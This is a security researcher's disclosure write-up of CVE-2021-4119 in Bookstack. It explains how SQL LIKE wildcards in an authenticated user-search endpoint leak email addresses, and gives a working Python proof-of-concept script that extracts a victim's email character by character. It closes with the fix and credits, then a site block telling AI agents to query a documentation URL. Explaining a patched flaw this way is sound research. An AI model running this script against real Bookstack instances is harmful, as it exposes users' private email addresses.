# CVE-2021-4119: \[Bookstack] Email harvesting via SQL "LIKE" clause exploitation

### Description

Bookstack is a popular wiki platform built in Laravel for storing and organising information and documentation. Prior to Bookstack v21.11.3, it contained an improper access control vulnerability which allowed authenticated users to harvest email addresses belonging to any user on the platform.

### Discovery

This was at the time where, I was focused on learning to review PHP apps written in the Laravel framework. Laravel apps are very easy to review compared to traditional PHP apps as we can easily obtain a lot of app functionality through the `routes` folder.

```
...
Route::get('/status', [StatusController::class, 'show']);
Route::get('/robots.txt', [HomeController::class, 'robots']);

// Authenticated routes...
Route::middleware('auth')->group(function () {

    // Secure images routing
    Route::get('/uploads/images/{path}', [Images\ImageController::class, 'showImage'])
        ->where('path', '.*$');

    // API docs routes
    Route::redirect('/api', '/api/docs');
    Route::get('/api/docs', [Api\ApiDocsController::class, 'display']);

    Route::get('/pages/recently-updated', [PageController::class, 'showRecentlyUpdated']);

    // Shelves
    Route::get('/create-shelf', [BookshelfController::class, 'create']);
    Route::get('/shelves/', [BookshelfController::class, 'index']);
...
```

&#x20;                                               code in `routes/web.php` in Bookstack

When testing Laravel apps, or any other apps build in the MVC architecture in general, the first thing you should do is to always review the routes present. They contain a treasure trove of information (such as hidden functionality present in the app) which are useful in mapping out the attack surface of the app.

While reviewing each route, I came across the `/search/users/select` endpoint.

```
Route::get('/search/users/select', [UserSearchController::class, 'forSelect']);
```

This endpoint points towards a function present inside a controller, particularly the `forSelect()` function present in the `UserSearchController()` controller. Controllers are also easy to find, they mostly reside in the `app/Http/Controllers` folder.

```
<?php

namespace BookStack\Http\Controllers;

use BookStack\Auth\User;
use Illuminate\Database\Eloquent\Builder;
use Illuminate\Http\Request;

class UserSearchController extends Controller
{
    /**
     * Search users in the system, with the response formatted
     * for use in a select-style list.
     */
    public function forSelect(Request $request)
    {
        $search = $request->get('search', '');
        $query = User::query()->orderBy('name', 'desc')
            ->take(20);

        if (!empty($search)) {
            $query->where(function (Builder $query) use ($search) {
                $query->where('email', 'like', '%' . $search . '%')
                    ->orWhere('name', 'like', '%' . $search . '%');
            });
        }

        $users = $query->get();

        return view('form.user-select-list', compact('users'));
    }
}
```

&#x20;                     code in `app/Http/Controllers/UserSearchController` in Bookstack

From the code, we can see that the `forSelect()` we can control one parameter, `search`  as evidenced in Line 17, `search = $request->get('search', '');`  The function takes this parameter and will search for an email or name similar to the input in the search parameter using the `LIKE` clause in Lines 23 and 24. If the `search` parameter is empty, the function returns a list of usernames. In both cases the function only returns usernames and not emails.

The `LIKE` clause is used to filter out results from a query using a regex-like expression.

```
 $query->where('email', 'like', '%' . $search . '%')
       ->orWhere('name', 'like', '%' . $search . '%');
```

&#x20;                                     Lines 23 and 24: Email and name search via `LIKE`

In general, there are 5 kinds of special characters that can be included in the `LIKE` clause

<table><thead><tr><th width="150">Symbol</th><th>Description</th><th>Example</th></tr></thead><tbody><tr><td>%</td><td>Represents zero or more characters</td><td>bl% finds bl, black, blue, and blob</td></tr><tr><td>_</td><td>Represents a single character</td><td>h_t finds hot, hat, and hit</td></tr><tr><td>[]</td><td>Represents any single character within the brackets</td><td>h[oa]t finds hot and hat, but not hit</td></tr><tr><td>^</td><td>Represents any character not in the brackets</td><td>h[^oa]t finds hit, but not hot and hat</td></tr><tr><td>-</td><td>Represents any single character within the specified range</td><td>c[a-b]t finds cat and cbt</td></tr></tbody></table>

&#x20;                             Table taken from <https://www.w3schools.com/sql/sql_wildcards.asp>

Looking back at  `$query->where('email', 'like', '%' . $search . '%')` . This is essentially filtering emails based on  `%{search}%`  where `{search}`  is something we can control.&#x20;

This means that for a user named `admin` with email, `admin@example.com`, if we input `?search=admin@`, the user named `admin` will appear on the frontend, as we are filtering based on `%admin@%`

It also means that we can pass in wildcards, if we input `?search=admi_@`, the user named `admin` will appear on the frontend, as we are filtering based on `%admi_@%`  where `_`  is a wildcard for any singular character. This will come in handy for later.

### Exploit

Keep in mind, that we can only receive usernames on the frontend. Hence, to exploit this using a `_` we need to first, identify the length of a users email address, which can be done easily by adding a `_` character incrementally,&#x20;

If we go back to the `admin@example.com` example, it matches `%_%`  as `admin@example.com` consists of **at least one** character, it matches `%__%`  as `admin@example.com` consists of **at least two** characters, it **does not** match `%__________________%` (18 \_'s), because `admin@example.com` is only 17 character long and so it does not contain **at least eighteen** characters.

So the first phase is to adding a `_` character incrementally, until our target user no longer appears on the endpoint. We then take the one less of the number of `_` characters required to identify the length of the username

```
## STEP 1: Find length of email
   for i in range(0,100):
       r = requests.get(host + "/search/users/select?search=" + "_" * i)
       if victim not in r.text:
           length = i - 1
           break
```

The second phase is to just fill in the blanks, by iterating through each `_`  replacing them and trying every possible character that can appear in emails. For example if the email is `admin@example.com`  we try every character for the first `_` then the user should only appear at `%a_________________%` .

```
  ## STEP 2: Extract email
   charList = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.']
   found = ""
   for ord in range(length-1, -1, -1):
      for char in charList:
          r = requests.get(host + "/search/users/select?search=" + found + char + "_" * ord)
          if victim in r.text:
             found += char
             print(found)
             break
```

Note we begin: with `length-1` as we only need to append `length-1` `_` s when we start of the first character.

The final exploit:

```
import requests

### REPLACE
host = "http://10.0.2.15"
username = "viewer"

### EXPLOIT START
def find(victim):
   ## STEP 1: Find length of email
   for i in range(0,100):
       r = requests.get(host + "/search/users/select?search=" + "_" * i)
       if victim not in r.text:
           length = i - 1
           break

  ## STEP 2: Extract email
   charList = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.']
   found = ""
   for ord in range(length-1, -1, -1):
      for char in charList:
          r = requests.get(host + "/search/users/select?search=" + found + char + "_" * ord)
          if victim in r.text:
             found += char
             print(found)
             break
   print("Email: " + found)
   return found

### CALL EXPLOIT
find(username)
```

Note that this PoC slightly differs from the one at <https://huntr.dev/bounties/135f2d7d-ab0b-4351-99b9-889efac46fca/>. The PoC in the huntr report still works as it is alright if the calculated length is greater than the actual length, just that we will take 28 additional tries (the size of the character list) for every extra character.

### Access Control

Though this post details a SQL LIKE clause exploitation. It is at its heart an access control vulnerability, because both unauthenticated and low-privileged users should not have permission to search for users by their emails. This vulnerability was fixed by restricting access to this particular endpoint to only users with user management permissions, as well as removing email-based search entirely.

### Acknowledgements

This vulnerability was discovered by me (@Haxatron) and reported via huntr.dev, a bug-bounty website for open-source software. Kudos to @ssddanbrown (maintainer) for acknowledging and fixing the vulnerability promptly as well as huntr.dev for the platform.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://haxatron.gitbook.io/vulnerability-research/vr1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
